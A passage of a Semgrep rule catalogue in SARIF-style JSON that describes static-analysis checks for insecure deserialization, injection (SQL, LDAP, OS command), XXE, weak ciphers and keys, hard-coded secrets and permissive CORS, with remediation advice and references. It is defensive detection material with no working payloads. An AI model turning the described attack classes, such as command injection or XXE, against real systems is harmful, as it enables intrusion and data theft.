pass it to the application, and take advantage of the deserialization process to perform Denial-of-service (DoS), Remote code execution (RCE), or bypass access control measures. A number of functions and packages in the `torch` module rely on the `pickle` module and should not be used to unpackage data from untrusted sources."},"helpUri":"https://semgrep.dev/r/python.flask.deserialization.tainted-torch-pickle-flask.tainted-torch-pickle-flask","id":"python.flask.deserialization.tainted-torch-pickle-flask.tainted-torch-pickle-flask","name":"python.flask.deserialization.tainted-torch-pickle-flask.tainted-torch-pickle-flask","properties":{"precision":"very-high","tags":["CWE-502: Deserialization of Untrusted Data","HIGH CONFIDENCE","OWASP-A08:2017 - Insecure Deserialization","OWASP-A08:2021 - Software and Data Integrity Failures","security"]},"shortDescription":{"text":"Semgrep Finding: python.flask.deserialization.tainted-torch-pickle-flask.tainted-torch-pickle-flask"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Untrusted input might be used to build an LDAP query, which can allow attackers to run arbitrary LDAP queries. If an LDAP query must contain untrusted input then it must be escaped."},"help":{"markdown":"Untrusted input might be used to build an LDAP query, which can allow attackers to run arbitrary LDAP queries. If an LDAP query must contain untrusted input then it must be escaped.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/cpp.lang.security.ldap.ldap-injection-dn.ldap-injection-dn)\n - [https://owasp.org/Top10/A03_2021-Injection](https://owasp.org/Top10/A03_2021-Injection)\n - [https://wiki.sei.cmu.edu/confluence/display/c/STR02-C.+Sanitize+data+passed+to+complex+subsystems](https://wiki.sei.cmu.edu/confluence/display/c/STR02-C.+Sanitize+data+passed+to+complex+subsystems)\n","text":"Untrusted input might be used to build an LDAP query, which can allow attackers to run arbitrary LDAP queries. If an LDAP query must contain untrusted input then it must be escaped."},"helpUri":"https://semgrep.dev/r/cpp.lang.security.ldap.ldap-injection-dn.ldap-injection-dn","id":"cpp.lang.security.ldap.ldap-injection-dn.ldap-injection-dn","name":"cpp.lang.security.ldap.ldap-injection-dn.ldap-injection-dn","properties":{"precision":"very-high","tags":["CWE-90: Improper Neutralization of Special Elements used in an LDAP Query ('LDAP Injection')","HIGH CONFIDENCE","OWASP-A01:2017 - Injection","OWASP-A03:2021 - Injection","security"]},"shortDescription":{"text":"Semgrep Finding: cpp.lang.security.ldap.ldap-injection-dn.ldap-injection-dn"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Use of Blowfish was detected. Blowfish uses a 64-bit block size that makes it vulnerable to birthday attacks, and is therefore considered non-compliant. Instead, use a strong, secure cipher: Cipher.getInstance(\"AES/CBC/PKCS7PADDING\"). See https://owasp.org/www-community/Using_the_Java_Cryptographic_Extensions for more information."},"help":{"markdown":"Use of Blowfish was detected. Blowfish uses a 64-bit block size that makes it vulnerable to birthday attacks, and is therefore considered non-compliant. Instead, use a strong, secure cipher: Cipher.getInstance(\"AES/CBC/PKCS7PADDING\"). See https://owasp.org/www-community/Using_the_Java_Cryptographic_Extensions for more information.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/java.lang.security.audit.crypto.use-of-blowfish.use-of-blowfish)\n - [https://owasp.org/Top10/A02_2021-Cryptographic_Failures](https://owasp.org/Top10/A02_2021-Cryptographic_Failures)\n - [https://googleprojectzero.blogspot.com/2022/10/rc4-is-still-considered-harmful.html](https://googleprojectzero.blogspot.com/2022/10/rc4-is-still-considered-harmful.html)\n","text":"Use of Blowfish was detected. Blowfish uses a 64-bit block size that makes it vulnerable to birthday attacks, and is therefore considered non-compliant. Instead, use a strong, secure cipher: Cipher.getInstance(\"AES/CBC/PKCS7PADDING\"). See https://owasp.org/www-community/Using_the_Java_Cryptographic_Extensions for more information."},"helpUri":"https://semgrep.dev/r/java.lang.security.audit.crypto.use-of-blowfish.use-of-blowfish","id":"java.lang.security.audit.crypto.use-of-blowfish.use-of-blowfish","name":"java.lang.security.audit.crypto.use-of-blowfish.use-of-blowfish","properties":{"precision":"very-high","tags":["CWE-327: Use of a Broken or Risky Cryptographic Algorithm","HIGH CONFIDENCE","OWASP-A02:2021 - Cryptographic Failures","OWASP-A03:2017 - Sensitive Data Exposure","security"]},"shortDescription":{"text":"Semgrep Finding: java.lang.security.audit.crypto.use-of-blowfish.use-of-blowfish"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Use of RSA-$BITS, which is considered weak. Based on NIST standards, RSA keys should be at least 2048 bits."},"help":{"markdown":"Use of RSA-$BITS, which is considered weak. Based on NIST standards, RSA keys should be at least 2048 bits.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/typescript.typescript.node.security.node-rsa-weak-key.node-rsa-weak-key)\n - [https://cheatsheetseries.owasp.org/cheatsheets/Cryptographic_Storage_Cheat_Sheet.html#algorithms](https://cheatsheetseries.owasp.org/cheatsheets/Cryptographic_Storage_Cheat_Sheet.html#algorithms)\n","text":"Use of RSA-$BITS, which is considered weak. Based on NIST standards, RSA keys should be at least 2048 bits."},"helpUri":"https://semgrep.dev/r/typescript.typescript.node.security.node-rsa-weak-key.node-rsa-weak-key","id":"typescript.typescript.node.security.node-rsa-weak-key.node-rsa-weak-key","name":"typescript.typescript.node.security.node-rsa-weak-key.node-rsa-weak-key","properties":{"precision":"very-high","tags":["CWE-326: Inadequate Encryption Strength","HIGH CONFIDENCE","OWASP-A02:2021 - Cryptographic Failures","OWASP-A03:2017 - Sensitive Data Exposure","security"]},"shortDescription":{"text":"Semgrep Finding: typescript.typescript.node.security.node-rsa-weak-key.node-rsa-weak-key"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"CodeClimate detected"},"help":{"markdown":"CodeClimate detected\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/generic.secrets.security.detected-codeclimate.detected-codeclimate)\n - [https://owasp.org/Top10/A07_2021-Identification_and_Authentication_Failures](https://owasp.org/Top10/A07_2021-Identification_and_Authentication_Failures)\n","text":"CodeClimate detected"},"helpUri":"https://semgrep.dev/r/generic.secrets.security.detected-codeclimate.detected-codeclimate","id":"generic.secrets.security.detected-codeclimate.detected-codeclimate","name":"generic.secrets.security.detected-codeclimate.detected-codeclimate","properties":{"precision":"very-high","tags":["CWE-798: Use of Hard-coded Credentials","LOW CONFIDENCE","OWASP-A07:2021 - Identification and Authentication Failures","security"]},"shortDescription":{"text":"Semgrep Finding: generic.secrets.security.detected-codeclimate.detected-codeclimate"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"An insecure SSL context was detected. TLS versions 1.0, 1.1, and all SSL versions are considered weak encryption and are deprecated. Use SSLContext.getInstance(\"TLSv1.2\") for the best security."},"help":{"markdown":"An insecure SSL context was detected. TLS versions 1.0, 1.1, and all SSL versions are considered weak encryption and are deprecated. Use SSLContext.getInstance(\"TLSv1.2\") for the best security.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/java.lang.security.audit.weak-ssl-context.weak-ssl-context)\n - [https://tools.ietf.org/html/rfc7568](https://tools.ietf.org/html/rfc7568)\n - [https://tools.ietf.org/id/draft-ietf-tls-oldversions-deprecate-02.html](https://tools.ietf.org/id/draft-ietf-tls-oldversions-deprecate-02.html)\n","text":"An insecure SSL context was detected. TLS versions 1.0, 1.1, and all SSL versions are considered weak encryption and are deprecated. Use SSLContext.getInstance(\"TLSv1.2\") for the best security."},"helpUri":"https://semgrep.dev/r/java.lang.security.audit.weak-ssl-context.weak-ssl-context","id":"java.lang.security.audit.weak-ssl-context.weak-ssl-context","name":"java.lang.security.audit.weak-ssl-context.weak-ssl-context","properties":{"precision":"very-high","tags":["CWE-326: Inadequate Encryption Strength","HIGH CONFIDENCE","OWASP-A02:2021 - Cryptographic Failures","OWASP-A03:2017 - Sensitive Data Exposure","security"]},"shortDescription":{"text":"Semgrep Finding: java.lang.security.audit.weak-ssl-context.weak-ssl-context"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"The application may convert user-controlled data into an object, which can lead to an insecure deserialization vulnerability. An attacker can create a malicious serialized object, pass it to the application, and take advantage of the deserialization process to perform Denial-of-service (DoS), Remote code execution (RCE), or bypass access control measures. Starting from `ruamel.yaml` version 0.15.0 the default loader (`typ='rt'`) is a direct derivative of the safe loader. Before this version, use the optional argument `Loader` with value `SafeLoader` or `CSafeLoader`, or use the `safe_load` function."},"help":{"markdown":"The application may convert user-controlled data into an object, which can lead to an insecure deserialization vulnerability. An attacker can create a malicious serialized object, pass it to the application, and take advantage of the deserialization process to perform Denial-of-service (DoS), Remote code execution (RCE), or bypass access control measures. Starting from `ruamel.yaml` version 0.15.0 the default loader (`typ='rt'`) is a direct derivative of the safe loader. Before this version, use the optional argument `Loader` with value `SafeLoader` or `CSafeLoader`, or use the `safe_load` function.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.aws-lambda.deserialization.tainted-ruamel-aws-lambda.tainted-ruamel-aws-lambda)\n - [https://cwe.mitre.org/data/definitions/502.html](https://cwe.mitre.org/data/definitions/502.html)\n - [https://knowledge-base.secureflag.com/vulnerabilities/unsafe_deserialization/unsafe_deserialization_python.html](https://knowledge-base.secureflag.com/vulnerabilities/unsafe_deserialization/unsafe_deserialization_python.html)\n - [https://nvd.nist.gov/vuln/detail/CVE-2017-18342](https://nvd.nist.gov/vuln/detail/CVE-2017-18342)\n - [https://owasp.org/Top10/A08_2021-Software_and_Data_Integrity_Failures](https://owasp.org/Top10/A08_2021-Software_and_Data_Integrity_Failures)\n - [https://portswigger.net/web-security/deserialization](https://portswigger.net/web-security/deserialization)\n - [https://yaml.readthedocs.io/en/latest/api/](https://yaml.readthedocs.io/en/latest/api/)\n","text":"The application may convert user-controlled data into an object, which can lead to an insecure deserialization vulnerability. An attacker can create a malicious serialized object, pass it to the application, and take advantage of the deserialization process to perform Denial-of-service (DoS), Remote code execution (RCE), or bypass access control measures. Starting from `ruamel.yaml` version 0.15.0 the default loader (`typ='rt'`) is a direct derivative of the safe loader. Before this version, use the optional argument `Loader` with value `SafeLoader` or `CSafeLoader`, or use the `safe_load` function."},"helpUri":"https://semgrep.dev/r/python.aws-lambda.deserialization.tainted-ruamel-aws-lambda.tainted-ruamel-aws-lambda","id":"python.aws-lambda.deserialization.tainted-ruamel-aws-lambda.tainted-ruamel-aws-lambda","name":"python.aws-lambda.deserialization.tainted-ruamel-aws-lambda.tainted-ruamel-aws-lambda","properties":{"precision":"very-high","tags":["CWE-502: Deserialization of Untrusted Data","HIGH CONFIDENCE","OWASP-A08:2017 - Insecure Deserialization","OWASP-A08:2021 - Software and Data Integrity Failures","security"]},"shortDescription":{"text":"Semgrep Finding: python.aws-lambda.deserialization.tainted-ruamel-aws-lambda.tainted-ruamel-aws-lambda"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Detected user input entering a method which executes a system command. This could result in a command injection vulnerability, which allows an attacker to inject an arbitrary system command onto the server. The attacker could download malware onto or steal data from the server. Instead, use ProcessBuilder, separating the command into individual arguments, like this: `new ProcessBuilder(\"ls\", \"-al\", targetDirectory)`. Further, make sure you hardcode or allowlist the actual command so that attackers can't run arbitrary commands."},"help":{"markdown":"Detected user input entering a method which executes a system command. This could result in a command injection vulnerability, which allows an attacker to inject an arbitrary system command onto the server. The attacker could download malware onto or steal data from the server. Instead, use ProcessBuilder, separating the command into individual arguments, like this: `new ProcessBuilder(\"ls\", \"-al\", targetDirectory)`. Further, make sure you hardcode or allowlist the actual command so that attackers can't run arbitrary commands.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/java.spring.security.injection.tainted-system-command.tainted-system-command)\n - [https://www.stackhawk.com/blog/command-injection-java/](https://www.stackhawk.com/blog/command-injection-java/)\n - [https://cheatsheetseries.owasp.org/cheatsheets/OS_Command_Injection_Defense_Cheat_Sheet.html](https://cheatsheetseries.owasp.org/cheatsheets/OS_Command_Injection_Defense_Cheat_Sheet.html)\n - [https://github.com/github/codeql/blob/main/java/ql/src/Security/CWE/CWE-078/ExecUnescaped.java](https://github.com/github/codeql/blob/main/java/ql/src/Security/CWE/CWE-078/ExecUnescaped.java)\n","text":"Detected user input entering a method which executes a system command. This could result in a command injection vulnerability, which allows an attacker to inject an arbitrary system command onto the server. The attacker could download malware onto or steal data from the server. Instead, use ProcessBuilder, separating the command into individual arguments, like this: `new ProcessBuilder(\"ls\", \"-al\", targetDirectory)`. Further, make sure you hardcode or allowlist the actual command so that attackers can't run arbitrary commands."},"helpUri":"https://semgrep.dev/r/java.spring.security.injection.tainted-system-command.tainted-system-command","id":"java.spring.security.injection.tainted-system-command.tainted-system-command","name":"java.spring.security.injection.tainted-system-command.tainted-system-command","properties":{"precision":"very-high","tags":["CWE-78: Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')","HIGH CONFIDENCE","OWASP-A01:2017 - Injection","OWASP-A03:2021 - Injection","security"]},"shortDescription":{"text":"Semgrep Finding: java.spring.security.injection.tainted-system-command.tainted-system-command"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Access-Control-Allow-Origin response header is set to \"*\". This will disable CORS Same Origin Policy restrictions."},"help":{"markdown":"Access-Control-Allow-Origin response header is set to \"*\". This will disable CORS Same Origin Policy restrictions.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/typescript.nestjs.security.audit.nestjs-header-cors-any.nestjs-header-cors-any)\n - [https://owasp.org/Top10/A04_2021-Insecure_Design](https://owasp.org/Top10/A04_2021-Insecure_Design)\n","text":"Access-Control-Allow-Origin response header is set to \"*\". This will disable CORS Same Origin Policy restrictions."},"helpUri":"https://semgrep.dev/r/typescript.nestjs.security.audit.nestjs-header-cors-any.nestjs-header-cors-any","id":"typescript.nestjs.security.audit.nestjs-header-cors-any.nestjs-header-cors-any","name":"typescript.nestjs.security.audit.nestjs-header-cors-any.nestjs-header-cors-any","properties":{"precision":"very-high","tags":["CWE-183: Permissive List of Allowed Inputs","LOW CONFIDENCE","OWASP-A04:2021 - Insecure Design","security"]},"shortDescription":{"text":"Semgrep Finding: typescript.nestjs.security.audit.nestjs-header-cors-any.nestjs-header-cors-any"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"The application is using an XML parser that has not been safely configured. This might lead to XML External Entity (XXE) vulnerabilities when parsing user-controlled input. An attacker can include document type definitions (DTDs) which can interact with internal or external hosts. XXE can lead to other vulnerabilities, such as Local File Inclusion (LFI), Remote Code Execution (RCE), and Server-side request forgery (SSRF), depending on the application configuration. An attacker can also use DTDs to expand recursively, leading to a Denial-of-Service (DoS) attack, also known as a `Billion Laughs Attack`. The XML parser $PARSER is not securely configured. The current configuration allows for XXE attacks. It is our recommendation to secure this parser against XXE attacks by configuring $PARSER with `$PARSER.setFeature(http://apache.org/xml/features/disallow-doctype-decl, true)`. Alternatively, the following configurations also provide protection against XXE attacks. `$PARSER.setProperty(XMLConstants.ACCESS_EXTERNAL_DTD, \"\")` `$PARSER.setFeature(\"http://xml.org/sax/features/external-general-entities\", false)` `$PARSER.setExpandEntities(false)` It is also possible to use one of the constructor parameters that will result in a more secure parser by default: `new SAXBuilder(XMLReaders.DTDVALIDATING)` or `new SAXBuilder(XMLReaders.XSDVALIDATING)`. The best defense against XXE is to have an XML parser that supports disabling DTDs. Limiting the use of external entities from the start can prevent the parser from being used to process untrusted XML files. Reducing dependencies on external resources is also a good practice for performance reasons. It is difficult to guarantee that even a trusted XML file on your server or during transmission has not been tampered with by a malicious third-party. For more information, see: [Java XXE prevention](https://semgrep.dev/docs/cheat-sheets/java-xxe/)"},"help":{"markdown":"The application is using an XML parser that has not been safely configured. This might lead to XML External Entity (XXE) vulnerabilities when parsing user-controlled input. An attacker can include document type definitions (DTDs) which can interact with internal or external hosts. XXE can lead to other vulnerabilities, such as Local File Inclusion (LFI), Remote Code Execution (RCE), and Server-side request forgery (SSRF), depending on the application configuration. An attacker can also use DTDs to expand recursively, leading to a Denial-of-Service (DoS) attack, also known as a `Billion Laughs Attack`. The XML parser $PARSER is not securely configured. The current configuration allows for XXE attacks. It is our recommendation to secure this parser against XXE attacks by configuring $PARSER with `$PARSER.setFeature(http://apache.org/xml/features/disallow-doctype-decl, true)`. Alternatively, the following configurations also provide protection against XXE attacks. `$PARSER.setProperty(XMLConstants.ACCESS_EXTERNAL_DTD, \"\")` `$PARSER.setFeature(\"http://xml.org/sax/features/external-general-entities\", false)` `$PARSER.setExpandEntities(false)` It is also possible to use one of the constructor parameters that will result in a more secure parser by default: `new SAXBuilder(XMLReaders.DTDVALIDATING)` or `new SAXBuilder(XMLReaders.XSDVALIDATING)`. The best defense against XXE is to have an XML parser that supports disabling DTDs. Limiting the use of external entities from the start can prevent the parser from being used to process untrusted XML files. Reducing dependencies on external resources is also a good practice for performance reasons. It is difficult to guarantee that even a trusted XML file on your server or during transmission has not been tampered with by a malicious third-party. For more information, see: [Java XXE prevention](https://semgrep.dev/docs/cheat-sheets/java-xxe/)\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/kotlin.xxe.saxbuilder-xxe.saxbuilder-xxe)\n - [https://blog.sonarsource.com/secure-xml-processor/](https://blog.sonarsource.com/secure-xml-processor/)\n - [https://blog.sonarsource.com/understanding-xxe-vulnerabilities/](https://blog.sonarsource.com/understanding-xxe-vulnerabilities/)\n - [https://cheatsheetseries.owasp.org/cheatsheets/XML_External_Entity_Prevention_Cheat_Sheet.html](https://cheatsheetseries.owasp.org/cheatsheets/XML_External_Entity_Prevention_Cheat_Sheet.html)\n - [https://cwe.mitre.org/data/definitions/776.html](https://cwe.mitre.org/data/definitions/776.html)\n - [https://docs.oracle.com/en/java/javase/13/security/java-api-xml-processing-jaxp-security-guide.html#GUID-D97A1F1D-8DDF-4D19-A7E5-99099F27346E](https://docs.oracle.com/en/java/javase/13/security/java-api-xml-processing-jaxp-security-guide.html#GUID-D97A1F1D-8DDF-4D19-A7E5-99099F27346E)\n - [https://github.com/returntocorp/java-xxe-research](https://github.com/returntocorp/java-xxe-research)\n - [https://owasp.org/Top10/A05_2021-Security_Misconfiguration](https://owasp.org/Top10/A05_2021-Security_Misconfiguration)\n - [https://rules.sonarsource.com/java/type/Vulnerability/RSPEC-2755](https://rules.sonarsource.com/java/type/Vulnerability/RSPEC-2755)\n - [https://semgrep.dev/blog/2022/xml-security-in-java](https://semgrep.dev/blog/2022/xml-security-in-java)\n - [https://semgrep.dev/docs/cheat-sheets/java-xxe/](https://semgrep.dev/docs/cheat-sheets/java-xxe/)\n","text":"The application is using an XML parser that has not been safely configured. This might lead to XML External Entity (XXE) vulnerabilities when parsing user-controlled input. An attacker can include document type definitions (DTDs) which can interact with internal or external hosts. XXE can lead to other vulnerabilities, such as Local File Inclusion (LFI), Remote Code Execution (RCE), and Server-side request forgery (SSRF), depending on the application configuration. An attacker can also use DTDs to expand recursively, leading to a Denial-of-Service (DoS) attack, also known as a `Billion Laughs Attack`. The XML parser $PARSER is not securely configured. The current configuration allows for XXE attacks. It is our recommendation to secure this parser against XXE attacks by configuring $PARSER with `$PARSER.setFeature(http://apache.org/xml/features/disallow-doctype-decl, true)`. Alternatively, the following configurations also provide protection against XXE attacks. `$PARSER.setProperty(XMLConstants.ACCESS_EXTERNAL_DTD, \"\")` `$PARSER.setFeature(\"http://xml.org/sax/features/external-general-entities\", false)` `$PARSER.setExpandEntities(false)` It is also possible to use one of the constructor parameters that will result in a more secure parser by default: `new SAXBuilder(XMLReaders.DTDVALIDATING)` or `new SAXBuilder(XMLReaders.XSDVALIDATING)`. The best defense against XXE is to have an XML parser that supports disabling DTDs. Limiting the use of external entities from the start can prevent the parser from being used to process untrusted XML files. Reducing dependencies on external resources is also a good practice for performance reasons. It is difficult to guarantee that even a trusted XML file on your server or during transmission has not been tampered with by a malicious third-party. For more information, see: [Java XXE prevention](https://semgrep.dev/docs/cheat-sheets/java-xxe/)"},"helpUri":"https://semgrep.dev/r/kotlin.xxe.saxbuilder-xxe.saxbuilder-xxe","id":"kotlin.xxe.saxbuilder-xxe.saxbuilder-xxe","name":"kotlin.xxe.saxbuilder-xxe.saxbuilder-xxe","properties":{"precision":"very-high","tags":["CWE-776: Improper Restriction of Recursive Entity References in DTDs ('XML Entity Expansion')","MEDIUM CONFIDENCE","OWASP-A04:2017 - XML External Entities (XXE)","OWASP-A05:2021 - Security Misconfiguration","security"]},"shortDescription":{"text":"Semgrep Finding: kotlin.xxe.saxbuilder-xxe.saxbuilder-xxe"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. Use environment variables to securely provide credentials and other secrets or retrieve them from a secure vault or Hardware Security Module (HSM)."},"help":{"markdown":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. Use environment variables to securely provide credentials and other secrets or retrieve them from a secure vault or Hardware Security Module (HSM).\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/swift.cryptoswift.rabbit-hardcoded-secret.rabbit-hardcoded-secret)\n - [https://cheatsheetseries.owasp.org/cheatsheets/Secrets_Management_Cheat_Sheet.html](https://cheatsheetseries.owasp.org/cheatsheets/Secrets_Management_Cheat_Sheet.html)\n","text":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. Use environment variables to securely provide credentials and other secrets or retrieve them from a secure vault or Hardware Security Module (HSM)."},"helpUri":"https://semgrep.dev/r/swift.cryptoswift.rabbit-hardcoded-secret.rabbit-hardcoded-secret","id":"swift.cryptoswift.rabbit-hardcoded-secret.rabbit-hardcoded-secret","name":"swift.cryptoswift.rabbit-hardcoded-secret.rabbit-hardcoded-secret","properties":{"precision":"very-high","tags":["CWE-798: Use of Hard-coded Credentials","HIGH CONFIDENCE","OWASP-A07:2021 - Identification and Authentication Failures","security"]},"shortDescription":{"text":"Semgrep Finding: swift.cryptoswift.rabbit-hardcoded-secret.rabbit-hardcoded-secret"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"File name based on user input risks server-side request forgery."},"help":{"markdown":"File name based on user input risks server-side request forgery.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/php.lang.security.injection.tainted-filename.tainted-filename)\n - [https://owasp.org/Top10/A10_2021-Server-Side_Request_Forgery_%28SSRF%29](https://owasp.org/Top10/A10_2021-Server-Side_Request_Forgery_%28SSRF%29)\n","text":"File name based on user input risks server-side request forgery."},"helpUri":"https://semgrep.dev/r/php.lang.security.injection.tainted-filename.tainted-filename","id":"php.lang.security.injection.tainted-filename.tainted-filename","name":"php.lang.security.injection.tainted-filename.tainted-filename","properties":{"precision":"very-high","tags":["CWE-918: Server-Side Request Forgery (SSRF)","MEDIUM CONFIDENCE","OWASP-A10:2021 - Server-Side Request Forgery (SSRF)","security"]},"shortDescription":{"text":"Semgrep Finding: php.lang.security.injection.tainted-filename.tainted-filename"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. Use environment variables to securely provide credentials and other secrets or retrieve them from a secure vault or Hardware Security Module (HSM)."},"help":{"markdown":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. Use environment variables to securely provide credentials and other secrets or retrieve them from a secure vault or Hardware Security Module (HSM).\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/java.jedis.secrets.jedis-jedisclientconfig-hardcoded-password.jedis-jedisclientconfig-hardcoded-password)\n - [https://cheatsheetseries.owasp.org/cheatsheets/Secrets_Management_Cheat_Sheet.html](https://cheatsheetseries.owasp.org/cheatsheets/Secrets_Management_Cheat_Sheet.html)\n","text":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. Use environment variables to securely provide credentials and other secrets or retrieve them from a secure vault or Hardware Security Module (HSM)."},"helpUri":"https://semgrep.dev/r/java.jedis.secrets.jedis-jedisclientconfig-hardcoded-password.jedis-jedisclientconfig-hardcoded-password","id":"java.jedis.secrets.jedis-jedisclientconfig-hardcoded-password.jedis-jedisclientconfig-hardcoded-password","name":"java.jedis.secrets.jedis-jedisclientconfig-hardcoded-password.jedis-jedisclientconfig-hardcoded-password","properties":{"precision":"very-high","tags":["CWE-798: Use of Hard-coded Credentials","HIGH CONFIDENCE","OWASP-A07:2021 - Identification and Authentication Failures","security"]},"shortDescription":{"text":"Semgrep Finding: java.jedis.secrets.jedis-jedisclientconfig-hardcoded-password.jedis-jedisclientconfig-hardcoded-password"}},{"defaultConfiguration":{"level":"note"},"fullDescription":{"text":"The libxml2 parser is configured to process entities. Without other options such as processing DTDs or accessing remote entities from the network, it should not pose a risk except for memory exhaustion."},"help":{"markdown":"The libxml2 parser is configured to process entities. Without other options such as processing DTDs or accessing remote entities from the network, it should not pose a risk except for memory exhaustion.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/cpp.libxml2.security.libxml2-expand-local-entities.libxml2-expand-local-entities)\n - [https://owasp.org/Top10/A05_2021-Security_Misconfiguration](https://owasp.org/Top10/A05_2021-Security_Misconfiguration)\n - [https://wiki.sei.cmu.edu/confluence/display/c/STR02-C.+Sanitize+data+passed+to+complex+subsystems](https://wiki.sei.cmu.edu/confluence/display/c/STR02-C.+Sanitize+data+passed+to+complex+subsystems)\n","text":"The libxml2 parser is configured to process entities. Without other options such as processing DTDs or accessing remote entities from the network, it should not pose a risk except for memory exhaustion."},"helpUri":"https://semgrep.dev/r/cpp.libxml2.security.libxml2-expand-local-entities.libxml2-expand-local-entities","id":"cpp.libxml2.security.libxml2-expand-local-entities.libxml2-expand-local-entities","name":"cpp.libxml2.security.libxml2-expand-local-entities.libxml2-expand-local-entities","properties":{"precision":"very-high","tags":["CWE-611: Improper Restriction of XML External Entity Reference","MEDIUM CONFIDENCE","OWASP-A04:2017 - XML External Entities (XXE)","OWASP-A05:2021 - Security Misconfiguration","security"]},"shortDescription":{"text":"Semgrep Finding: cpp.libxml2.security.libxml2-expand-local-entities.libxml2-expand-local-entities"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Detected file permissions that are overly permissive (read, write, and execute). It is generally a bad practices to set overly permissive file permission such as read+write+exec for all users. If the file affected is a configuration, a binary, a script or sensitive data, it can lead to privilege escalation or information leakage. Instead, follow the principle of least privilege and give users only the permissions they need."},"help":{"markdown":"Detected file permissions that are overly permissive (read, write, and execute). It is generally a bad practices to set overly permissive file permission such as read+write+exec for all users. If the file affected is a configuration, a binary, a script or sensitive data, it can lead to privilege escalation or information leakage. Instead, follow the principle of least privilege and give users only the permissions they need.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/java.lang.security.audit.overly-permissive-file-permission.overly-permissive-file-permission)\n - [https://owasp.org/Top10/A01_2021-Broken_Access_Control](https://owasp.org/Top10/A01_2021-Broken_Access_Control)\n","text":"Detected file permissions that are overly permissive (read, write, and execute). It is generally a bad practices to set overly permissive file permission such as read+write+exec for all users. If the file affected is a configuration, a binary, a script or sensitive data, it can lead to privilege escalation or information leakage. Instead, follow the principle of least privilege and give users only the permissions they need."},"helpUri":"https://semgrep.dev/r/java.lang.security.audit.overly-permissive-file-permission.overly-permissive-file-permission","id":"java.lang.security.audit.overly-permissive-file-permission.overly-permissive-file-permission","name":"java.lang.security.audit.overly-permissive-file-permission.overly-permissive-file-permission","properties":{"precision":"very-high","tags":["CWE-276: Incorrect Default Permissions","LOW CONFIDENCE","OWASP-A01:2021 - Broken Access Control","security"]},"shortDescription":{"text":"Semgrep Finding: java.lang.security.audit.overly-permissive-file-permission.overly-permissive-file-permission"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Untrusted input might be used to build a database query, which can lead to a SQL injection vulnerability. An attacker can execute malicious SQL statements and gain unauthorized access to sensitive data, modify, delete data, or execute arbitrary system commands. To prevent this vulnerability, use prepared statements that do not concatenate user-controllable strings and use parameterized queries where SQL commands and user data are strictly separated. Also, consider using an object-relational (ORM) framework to operate with safer abstractions."},"help":{"markdown":"Untrusted input might be used to build a database query, which can lead to a SQL injection vulnerability. An attacker can execute malicious SQL statements and gain unauthorized access to sensitive data, modify, delete data, or execute arbitrary system commands. To prevent this vulnerability, use prepared statements that do not concatenate user-controllable strings and use parameterized queries where SQL commands and user data are strictly separated. Also, consider using an object-relational (ORM) framework to operate with safer abstractions.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/rust.hyper.sql.tokio-postgres-taint.tokio-postgres-taint)\n - [https://docs.rs/tokio-postgres/latest/tokio_postgres/](https://docs.rs/tokio-postgres/latest/tokio_postgres/)\n - [https://owasp.org/Top10/A03_2021-Injection](https://owasp.org/Top10/A03_2021-Injection)\n","text":"Untrusted input might be used to build a database query, which can lead to a SQL injection vulnerability. An attacker can execute malicious SQL statements and gain unauthorized access to sensitive data, modify, delete data, or execute arbitrary system commands. To prevent this vulnerability, use prepared statements that do not concatenate user-controllable strings and use parameterized queries where SQL commands and user data are strictly separated. Also, consider using an object-relational (ORM) framework to operate with safer abstractions."},"helpUri":"https://semgrep.dev/r/rust.hyper.sql.tokio-postgres-taint.tokio-postgres-taint","id":"rust.hyper.sql.tokio-postgres-taint.tokio-postgres-taint","name":"rust.hyper.sql.tokio-postgres-taint.tokio-postgres-taint","properties":{"precision":"very-high","tags":["CWE-89: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')","HIGH CONFIDENCE","OWASP-A01:2017 - Injection","OWASP-A03:2021 - Injection","security"]},"shortDescription":{"text":"Semgrep Finding: 